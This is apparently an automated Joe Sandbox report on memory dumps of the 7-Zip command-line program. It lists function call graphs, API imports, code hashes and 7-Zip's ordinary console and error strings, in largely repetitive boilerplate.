                              • Opcode Fuzzy Hash: ca37d54a7fa88057a717ca580f3b84c90e82dc324110684d6e4634f1a47e3e16
                              • Instruction Fuzzy Hash: C761AE73204A8AA2DB64EF25E8907EDB320F785B94F808122DB9D47B64DF3CD955E740
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ClearVariant
                              • String ID:
                              • API String ID: 1677346816-0
                              • Opcode ID: b51a64e2049aaacb224f193728cd5ebf52c6ea1f6f529c4464fa16420fdb4b89
                              • Instruction ID: 48b5444a897ba5b15cb56312eee3e46ad8238244f8d7ca3ca5b6d551c317255e
                              • Opcode Fuzzy Hash: b51a64e2049aaacb224f193728cd5ebf52c6ea1f6f529c4464fa16420fdb4b89
                              • Instruction Fuzzy Hash: B0C19123704A4482CB60EF25D88026E7770F789B54F948123EB8EA7B25DF3DC955EB02
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: ..\
                              • API String ID: 1294909896-2756224523
                              • Opcode ID: 2d616d1f092bf375b5cc6aa2bb401b026288b91804a8fd3acb80ee064d591f2f
                              • Instruction ID: c68b21c28847fb4b264c6da6592c89c3faa800542ceb9686b61484fcd7e64c92
                              • Opcode Fuzzy Hash: 2d616d1f092bf375b5cc6aa2bb401b026288b91804a8fd3acb80ee064d591f2f
                              • Instruction Fuzzy Hash: 8D61A52771468486CB60EF16E89029E7721FBC5BA4F584122EF4E1B758EF7DC842DB11
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free$fputc
                              • String ID: Modified: $Path: $Size:
                              • API String ID: 2662072562-3207571042
                              • Opcode ID: 1538d324f453466ecd84c9ba88d1f3f2ed81e73a186bad75c1ee4b4f1d3be273
                              • Instruction ID: 17b170254e5095b2befa5145dbc10143bb0d63f2feb1c406442a6894db393658
                              • Opcode Fuzzy Hash: 1538d324f453466ecd84c9ba88d1f3f2ed81e73a186bad75c1ee4b4f1d3be273
                              • Instruction Fuzzy Hash: 70214162200A4282DE60EF15ED5037D2322FB85BF5F4482379E6D47AE5DF29C55AE301
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: a34c07180234e12b002462881317195d17831750ce67edd19fac51360f5d6a67
                              • Instruction ID: 1db413da9421f77a571b59fa822d3bc875201c73ea20062ac30e58fd51e17693
                              • Opcode Fuzzy Hash: a34c07180234e12b002462881317195d17831750ce67edd19fac51360f5d6a67
                              • Instruction Fuzzy Hash: F2216D2224968982CBD0FB32D8A166E7710FBC2F84F849422EE4E57621CE3DC567A715
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID: : $ : MINOR_ERROR$...$Junction: $Link: $REPARSE:$WSL:
                              • API String ID: 1534225298-3981964144
                              • Opcode ID: 2bf224b8c6430fcf35db2824f17603b96da4f2cdf43c971f167d23e4c8ada00c
                              • Instruction ID: c42b77fa450b9280e450dbbb633a80eeec99de6b759d4002349ae029fc807e63
                              • Opcode Fuzzy Hash: 2bf224b8c6430fcf35db2824f17603b96da4f2cdf43c971f167d23e4c8ada00c
                              • Instruction Fuzzy Hash: 4471042221060292DB20EF26EC513AE7765F7817A8F44D123EB8A4775ADF7CC545FB12
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$AddressHandleModuleProc
                              • String ID: : $ SP:$RtlGetVersion$Windows$ntdll.dll
                              • API String ID: 399046674-586651410
                              • Opcode ID: 51a7da11933e7792f8993f7090476a80b9ee33e58fdb39d0906823acee528ced
                              • Instruction ID: 67cc1f8b42bec353207e0ef9da8f24ffa195d97e12b80ca8d15e4999c47b81d7
                              • Opcode Fuzzy Hash: 51a7da11933e7792f8993f7090476a80b9ee33e58fdb39d0906823acee528ced
                              • Instruction Fuzzy Hash: EC313523218685A2CA70EB10EC513AEB331FBD4754F809117F19D42AB9DF7CC649EB02
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs
                              • String ID: = $ERROR$ERRORS:$WARNING$WARNINGS:
                              • API String ID: 1795875747-2836439314
                              • Opcode ID: deb63fc6d31ce95afea9bbb749a350c3005a631048944af1174f6f81a7a761c9
                              • Instruction ID: 51a8897ef2af0cfe2d24d7315c6c90da82c335155bfc979601edc8247033e873
                              • Opcode Fuzzy Hash: deb63fc6d31ce95afea9bbb749a350c3005a631048944af1174f6f81a7a761c9
                              • Instruction Fuzzy Hash: 4F11B1A261065293EF349B26DA457287722F748F94F489026CF4903E94DF79C8A9E300
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free
                              • String ID: $ MB$ Memory =
                              APIs
                              • fputs.MSVCRT ref: 00FC2DA3
                              • fputs.MSVCRT ref: 00FC2DC0
                              • fputs.MSVCRT ref: 00FC2DD0
                                • Part of subcall function 00F72790: fputs.MSVCRT ref: 00F727D9
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727E5
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727F0
                              • fputs.MSVCRT ref: 00FC2DEE
                              Similarity
                              • API ID: fputs$free
                              • String ID: : Cannot open the file as [$ERROR$Open $WARNING$] archive
                              Similarity
                              • API ID: free$AddressHandleModuleProc
                              • String ID: CreateHardLinkW$kernel32.dll
                              Similarity
                              • API ID: free
                              Similarity
                              • API ID: ClearVariant
                              • String ID: \??\
                              Similarity
                              • API ID: free$memmove
                              • String ID: hash
                              APIs
                                • Part of subcall function 00F71E58: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F71E9F
                              • _CxxThrowException.MSVCRT ref: 00F842EE
                                • Part of subcall function 00F738A8: free.MSVCRT ref: 00F738E0
                                • Part of subcall function 00F739AC: memmove.MSVCRT ref: 00F739D9
                              • free.MSVCRT ref: 00F842A5
                              • _CxxThrowException.MSVCRT ref: 00F842C8
                              • _CxxThrowException.MSVCRT ref: 00F84322
                              • free.MSVCRT ref: 00F843B6
                              • free.MSVCRT ref: 00F843BE
                              • free.MSVCRT ref: 00F843CC
                              Strings
                              • Incorrect item in listfile.Check charset encoding and -scs switch., xrefs: 00F842D1, 00F84305
                              • The file operation error for listfile, xrefs: 00F84268
                              Similarity
                              • API ID: free$ExceptionThrow$ErrorLastmemmove
                              • String ID: Incorrect item in listfile.Check charset encoding and -scs switch.$The file operation error for listfile
                              APIs
                                • Part of subcall function 00F735B8: memmove.MSVCRT ref: 00F735F0
                                • Part of subcall function 00F73958: memmove.MSVCRT ref: 00F73997
                              • free.MSVCRT ref: 00F8693E
                              • free.MSVCRT ref: 00F86983
                              • free.MSVCRT ref: 00F869B0
                              • free.MSVCRT ref: 00F869E6
                              • free.MSVCRT ref: 00F86A50
                                • Part of subcall function 00F7960C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,00000000,?,?,00000000,?,00000003,00000003), ref: 00F7961E
                              Similarity
                              • API ID: free$memmove$CloseHandle
                              • String ID: :Zone.Identifier
                              Similarity
                              • API ID: free
                              Similarity
                              • API ID: free
                              Similarity
                              • API ID: free$memmove
                              Similarity
                              • API ID: free
                              • String ID: /$\$a$z
                              Similarity
                              • API ID: free$memmove
                              • String ID: crc$flags$memuse
                              Similarity
                              • API ID: free
                              • String ID: Pzm$crc32$crc64$md5$sha1$sha256
                              Similarity
                              • API ID: free
                              Similarity
                              • API ID: free$memmove
                              Similarity
                              • API ID: memcmp
                              Similarity
                              • API ID: free
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 0816cad8a9ea06915a236e8603301d5263cf40a5a715ebb3b4369cad3db0b704
                              • Instruction ID: 0fe31133cd4f0094fbaab2e9647127041697e6f902ba7736ee33e9653f41389f
                              • Instruction Fuzzy Hash: C801122324564981C7D1F736E86166E6310FBC6B91F849023EE0E57711CE3DC4A7A715
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: e186d5f6c2a6a8e5e5618b41f51224d408bf29008b427c36f0df3b9dac91f40b
                              • Instruction ID: a950b332b2ec630b9e0c29f66cf03e0dc50ba507ddd278894db2e8d55e1f59a0
                              • Instruction Fuzzy Hash: F301FB2324564A82CBD1F736E85166E6310FBC2B91F80A022EE0E57621DE3DC4A7A716
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: d16567f6c00b92bf3affa58cb78e9578cc7c9085ca4f2d812a04ae04698967dd
                              • Instruction ID: 0b4296cd88c2605955a0e2e5fb0c8f5e88de5e60d5107068d865411b6fd830a6
                              • Instruction Fuzzy Hash: 0A01FB2324564A82CBD1F736E85166E6310FBC2B91F809023EE0E57621CE3DC5A7A616
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: ce6774dc4cefc2f10703df0088628459081cb7c9729eaeb008019dfa35909437
                              • Instruction ID: 966403f4903fe3a3f30dcc0a464477ef18f783c30c88d769313f591a5efb7474
                              • Instruction Fuzzy Hash: 08F01D2324564982CBD1F736E85166E6310EBC2B91F809023EE0E57621CE3DC5A7A715
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 567f433233aab85a3815d1036ae4ca761e1692422187d0b75a72c43c8f0da7d1
                              • Instruction ID: 21afc223e4dca786a43e8f2ab83493c1a9223445aa8b65fcbdd271a34c23c57e
                              • Instruction Fuzzy Hash: AF017123710A8989CB90FE36DC9156C3320EB85BA8B488533BF0D5F715DE29CC629351
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: c46e5541d977855d1a0c37effd58fe58424e248d92aec372ebddbd1a340c7478
                              • Instruction ID: 682d2e4af4c383e5383e78a9f0112178ad6c71f2a1707b2b2727b5ae82d2356a
                              • Instruction Fuzzy Hash: 7D012563B11A8589CB90FF36DC9119C3320EB85FA9F588132BE0D5F765DE29CC629351
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID: ??\
                              • API String ID: 1534225298-3933555804
                              • Opcode ID: 89cfc767efb9ab766bc2f8585a8b153b0681b1a8072a88ea8b9d26a6b54f2955
                              • Instruction ID: b499e0e29eaa453b406331ebbc05f68460860b0142b7b935f2b20f52b9ba7c42
                              • Instruction Fuzzy Hash: FD718B73A15A8086CB20DF21D8101AD7320FB95B94B8AD027EB9E47724EB7DC956F703
                              APIs
                              • free.MSVCRT ref: 00F84872
                                • Part of subcall function 00F841F4: free.MSVCRT ref: 00F842A5
                                • Part of subcall function 00F841F4: _CxxThrowException.MSVCRT ref: 00F842C8
                                • Part of subcall function 00F841F4: _CxxThrowException.MSVCRT ref: 00F842EE
                                • Part of subcall function 00F841F4: _CxxThrowException.MSVCRT ref: 00F84322
                              • free.MSVCRT ref: 00F848BB
                              • _CxxThrowException.MSVCRT ref: 00F848FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ExceptionThrow$free
                              • String ID: Incorrect wildcard type marker$Too short switch$inorrect switch
                              • API String ID: 3129652135-3392774464
                              • Opcode ID: 75254e321aba016fd7ca34ce8b583dfbb945adc394beb129086a94450d6d3e0a
                              • Instruction ID: c365a9aac7720a1a7c23a429fc8f661546212db3b80b9075aa42353c493439dc
                              • Instruction Fuzzy Hash: 6F711B236086C295DB60EF25E8803EEBB61F3D1794F548123EB8A07B58DB7DD895E700
                              APIs
                              • fputs.MSVCRT ref: 00FCCC30
                              • fputs.MSVCRT ref: 00FCCD17
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                                • Part of subcall function 00F72790: fputs.MSVCRT ref: 00F727D9
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727E5
                                • Part of subcall function 00F72790: free.MSVCRT ref: 00F727F0
                                • Part of subcall function 00F724C4: fputc.MSVCRT ref: 00F724D5
                              • fputs.MSVCRT ref: 00FCCE03
                                • Part of subcall function 00F724A8: fflush.MSVCRT ref: 00F724AF
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$free$fflushfputcmemset
                              • String ID: ERROR: $ERRORS:$WARNINGS:
                              • API String ID: 2975459029-4064182643
                              • Opcode ID: 15f5701c0a91d4a9998e26da8d0ac5bba960db307386a34ac971619cd8b529d9
                              • Instruction ID: 0698ce79632772edcc2ff5e0ef18ea30e2f309e13f2b9cad4257194c18897583
                              • Instruction Fuzzy Hash: 1071C766B006C695CE7CEF76DA52B6E7312F741B90F08842BDF1E47602CF28D891A391
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputsmemsetstrlen$free
                              • String ID:
                              • API String ID: 2852212109-2735817509
                              • Opcode ID: 9a7147a006a768db9ea54475be91510b63d358eb6ce8c9524d123a3ef5e3e896
                              • Instruction ID: 21044cbf94f552ae0aec4c98e5c5e0911f594ad484d08fa069de2e092920b953
                              • Instruction Fuzzy Hash: B151022220868186C760DB26E9517AEB7B1F385BD4F58912AEF8A07B18CF3CC595DB00
                              APIs
                              • EnterCriticalSection.KERNEL32 ref: 00FC064E
                                • Part of subcall function 00F73730: free.MSVCRT ref: 00F7376A
                                • Part of subcall function 00F73730: memmove.MSVCRT(00000000,?,?,00000000,00F710B0), ref: 00F73785
                              • fputs.MSVCRT ref: 00FC0716
                              • fputs.MSVCRT ref: 00FC07F8
                              • fputs.MSVCRT ref: 00FC0814
                              • LeaveCriticalSection.KERNEL32 ref: 00FC08B6
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$CriticalSection$EnterLeavefreememmove
                              • String ID: ???
                              • API String ID: 2578255354-1053719742
                              • Opcode ID: 8bc78d78a14cb8c6c1f32dd9e7f73f0023bb57c4da4c75337c1a0a2f7e0af3ab
                              • Instruction ID: 824486ba636702580756a7fa0b36b02b9cb4c9fbd96d4097822241daf3ac1af6
                              • Instruction Fuzzy Hash: 17615A36700A82E2DB1DDF21DA55BE97321FB84B95F44802ADB1D47764CF38E4AAE340
                              APIs
                              • DeviceIoControl.KERNEL32 ref: 00F79D32
                              • DeviceIoControl.KERNEL32 ref: 00F79E16
                              • DeviceIoControl.KERNEL32 ref: 00F79E6D
                              • DeviceIoControl.KERNEL32 ref: 00F79EAE
                                • Part of subcall function 00F7BC48: GetModuleHandleW.KERNEL32 ref: 00F7BC69
                                • Part of subcall function 00F7BC48: GetProcAddress.KERNEL32 ref: 00F7BC79
                                • Part of subcall function 00F7BC48: GetDiskFreeSpaceW.KERNEL32 ref: 00F7BCCA
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
                              • String ID: ($:
                              • API String ID: 4250411929-4277925470
                              • Opcode ID: ce002fe7effc5463a8c12060252067aaf69f96b6df7ad79dc4c52b9bfb511346
                              • Instruction ID: 8de6311ce5b7f11ad85f11e61fbe92bab6c5d8054ee295264d7f95381c905aa5
                              • Instruction Fuzzy Hash: FD518722A0DBC085CB31CF24E05079EB764F784768F54D12AEB8E47B58EBB9C495DB41
                              APIs
                              • EnterCriticalSection.KERNEL32 ref: 00FC0492
                              • fputs.MSVCRT ref: 00FC04F4
                              • fputs.MSVCRT ref: 00FC0520
                                • Part of subcall function 00FCB4D0: memset.MSVCRT ref: 00FCB515
                                • Part of subcall function 00FCB4D0: fputs.MSVCRT ref: 00FCB53A
                              • LeaveCriticalSection.KERNEL32 ref: 00FC0616
                              Strings
                              • Would you like to replace the existing file:, xrefs: 00FC04ED
                              • with the file from archive:, xrefs: 00FC0516
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs$CriticalSection$EnterLeavememset
                              • String ID: Would you like to replace the existing file:$with the file from archive:
                              • API String ID: 892811258-686978020
                              • Opcode ID: c881acb3389518f5123ea07b1376a2264f6856e76189f8387ea8ec76bb02d490
                              • Instruction ID: 26e7c1df48cc9d0ed8bba17fcfda6263117155fedb103dd7df6d904c4b09cb21
                              • Instruction Fuzzy Hash: C641B176310687D6EB29DF25DA52BA87321F784B90F4881269F0D47711CF3CC896EB00
                              APIs
                              Strings
                              • Enter password (will not be echoed):, xrefs: 00FCD191
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
